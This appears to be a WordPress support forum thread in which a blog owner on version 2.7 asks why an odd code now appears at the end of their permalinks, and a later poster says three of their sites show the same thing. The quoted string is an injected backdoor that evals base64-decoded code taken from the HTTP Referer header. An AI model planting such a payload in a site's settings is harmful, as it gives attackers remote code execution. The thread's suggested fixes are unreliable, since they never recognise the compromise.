delete the .htaccess in wordpress root
regenerate permalinks
admin – settings – permalinks
Weird: i dont have any .htaccess in my wordpress root.
Should i regenerate permalinks anyways?
Thanks.
There is no “regenerate permalinks” button in my admin – settings – permalinks panel, or at least i dont see it.
I used to have this permalink structure:
http://prestiti-personali.gruppomoney.it/blog/2007/11/21/prestiti-personali-e-cessione-del-quinto/
now WP adds a strange code, like: /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
at the end of the permalink.
I have the option “Custom Structure” flagged, when i guess it used to be “Day and name”.
Thanks for the support, i hope the blog isnt dead, it would be simply tragic.
the Process of illumination, stuck in the dark.
…and if my .htaccess disappeared for some reason, should i create a new one? I am using WP 2.7, where could i find it?
I tried changing back to “day and name” to see what happens, but i have a message that says that i should modify my .htaccess, but i dont have it!
thanks to everyone who can help!

Yep, noticed it on three sites so far, including a WPMU on 2.8.1.
